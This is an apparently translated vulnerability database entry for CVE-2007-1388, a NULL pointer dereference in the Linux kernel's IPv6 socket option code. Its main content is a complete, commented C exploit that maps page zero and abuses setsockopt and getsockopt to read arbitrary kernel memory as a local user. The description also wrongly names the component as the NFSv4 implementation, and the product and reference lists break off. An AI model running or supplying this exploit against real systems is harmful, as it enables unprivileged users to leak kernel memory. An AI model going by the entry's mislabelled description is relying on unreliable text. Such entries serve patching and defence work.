Linux Kernel ipv6_sockglue.c NULL Pointer Dereference Vulnerability

Vulnerability ID: 1112550    Vulnerability type: Resource management error
Published: 2007-03-26    Updated: 2007-07-09
CVE number: CVE-2007-1388    CNNVD ID: CNNVD-200703-306
Platform: Linux    CVSS score: 4.4
|Vulnerability sources
https://www.exploit-db.com/exploits/29781
https://www.securityfocus.com/bid/23142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-306
|Vulnerability details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation in the United States. The NFSv4 implementation is one of its distributed file system protocols. The do_ipv6_setsockopt function in the Linux kernel's net/ipv6/ipv6_sockglue.c file has a NULL pointer dereference problem; a local attacker could exploit this vulnerability to cause a kernel denial of service.
|Vulnerability EXP
/*
source: http://www.securityfocus.com/bid/23142/info

The Linux kernel is prone to a NULL-pointer dereference vulnerability.

A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
*/


__ ip2.c __
// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker
// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
//
// De-obfuscated form of the original (the interleaved typedefs and macros
// have been expanded into plain C; behaviour is unchanged). The missing
// <sys/socket.h> include has been added and the format specifiers now match
// the long-sized arguments.
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/mman.h>
#include <sys/socket.h>

static int read_kernel_word(int fd, unsigned long addr, unsigned long *out);
static void map_page_zero(void);

int main(int argc, char *argv[])
{
    unsigned long tmp;
    unsigned long addr;
    int s;

    if (argc != 2)
        exit(-1);
    if (1 != sscanf(argv[1], " 0x%lx", &addr))
        exit(-1);
    /* Bail out quietly if the fake structure at page zero is not reachable. */
    signal(SIGSEGV, &exit);
    s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
    map_page_zero();
    /* Option 6 (IPV6_2292PKTOPTIONS) with a NULL buffer and zero length:
     * this is the do_ipv6_setsockopt path the advisory describes. */
    setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
    read_kernel_word(s, addr, &tmp);
    printf("Kernel memory @ %.8lx contains %.8lx\n", addr, tmp);
    return 0;
}

/* With page zero mapped, the kernel's NULL pointer lands in user memory:
 * plant the target kernel address at offset 8 of that page and let
 * getsockopt (option 59, IPV6_DSTOPTS) copy from it into *out. */
static int read_kernel_word(int fd, unsigned long addr, unsigned long *out)
{
    socklen_t len = 4;
    *(unsigned long *)(0x8) = addr;
    return getsockopt(fd, IPPROTO_IPV6, 59, (void *)out, &len);
}

/* Map a writable anonymous page at address 0. This fails on kernels that
 * enforce vm.mmap_min_addr, which is the mitigation for this technique. */
static void map_page_zero(void)
{
    void *p = mmap((void *)NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        exit(412);
    }
}
__ ip2.c EOF __
|Affected products
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu
|References

Source: BID
Name: 23142
Link: http://www.securityfocus.com/bid/23142
Source: www.kernel.org
Link: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.4
Source: VUPEN
Name: ADV-2007-1122
Link: http://www.frsirt.com/english/advisories/2007/1122
Source: MISC
Link: http://bugzilla.kernel.org/show_bug.cgi?id=8155
Source: issues.rpath.com
Link: https://issues.rpath.com/browse/RPL-1154
Source: UBUNTU
Name: USN-464-1
Link: http://www.ubuntu.com/usn/usn-464-1
Source: REDHAT
Name: RHSA-2007:0169
Link: http://www.redhat.com/support/errata/RHSA-2007-0169.html
Source: MANDRIVA
Name: MDKSA-2007:078
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
Source: SECUNIA
Name: 25392
Link: http://secunia.com/advisories/25392
Source: SECUNIA
Name: 25099
Link: http://secunia.com/advisories/25099
Source: SECUNIA
Name: 25080
Link: http://secunia.com/advisories/25080
Source: SECUNIA
Name: 24901
Link: http://secunia.com/advisories/24901
Source: SECUNIA
Name: 24777
Link: http://secunia.com/advisories/24777
Source: SUSE
Name: SUSE-SA:2007:029
Link: http://lists.suse.com/archive/suse-security-announce/2007-May/0001.html
Source: MANDRI